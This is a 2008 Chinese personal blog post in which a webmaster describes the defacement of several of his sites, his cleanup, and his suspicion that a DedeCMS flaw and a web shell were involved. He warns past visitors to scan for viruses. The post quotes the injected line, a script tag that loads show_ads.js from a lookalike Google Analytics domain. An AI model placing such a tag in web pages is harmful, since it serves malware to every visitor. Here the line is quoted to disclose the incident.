恳请注意：如果你在2008年9月13日之后访问过94boy.com/fengr.com/mingrxp.com，请您查一下本机病毒。由此给你带来的不便我深感抱歉！如果您无杀毒软件，我们推荐您使用www.360.cn以及它自带的免费BT杀软或者NOD32。

　　八月十五凌晨，临睡之前习惯性的上网站想看一下访问统计，结果发现浏览器反应异常，在页面某些部位出现了严重的错版现象，打开源代码一看，代码多了些内容。于是登陆FTP，一看吓一跳，服务器上所有的HTML HTM PHP JPG GIF PNG文件都被修改。偶的第一反应就是马上登陆服务器数据库管理系统，查了下下，数据库安好，还算是不错。然后统计损失，发现同IP下94boy fengr mingrxp三个网站被黑，其他两个安好，我的狗窝文件从FTP上看不到修改痕迹。Cyouzi也幸免于难。有些庆幸。接下来我替换了94boy的后台程序，并且跟服务器管理员沟通了下下，此时已经早上9点了，中间睡了3个小时。呵呵。。

　　Google了下下病毒代码，发现只有使用DEDECMS的人有报告这个代码，为了防范于未然，我把用DEDECMS做的fengr全站删除了（只保留了播客），于是这周的日程上多了重新设计制作fengr的任务，预计工期半个月，这周三开始。删掉dedecms后直到现在，服务器没有再被侵染，看来有一定效果。（dedecms是个好程序，大陆很多网站都是用的它）

　　期间比较奇怪的事情是，我的BLOG（WorldPress 2.5.1后台）文件没有任何修改迹象，但是打开速度超级慢，而且连接不上数据库（我却能登陆后台）。因为其他网站更重要，所以一直没动它，结果现在莫名其妙又好了，真是诡异。斌斌说是WP的程序漏洞的问题，但是服务器日志里根本没有记录，甚至那天我博客的访问量都小到忽略不计。而且放博客的目录并没有被侵染。数据库也没有任何损失。

　　附上被添加的病毒代码：<script src=http://www.google-analytics.tw.cn/show_ads.js></script>

　　昨天八月十五，家里很热闹，家族的人几乎都来了，除了那在廊坊上学的老妹，发短信气气她，得逞。很幸福哟。哈哈哈哈。

　　最新进展: 网页继续被修改，但没有被挂马，怀疑web shell权限已经被夺取，等待服务商解决。

标签 : 

原文链接 : http://www.foxdoggie.com/blog/200809516.html

转载原创文章请注明 : 狐狸狗窝

收藏到 :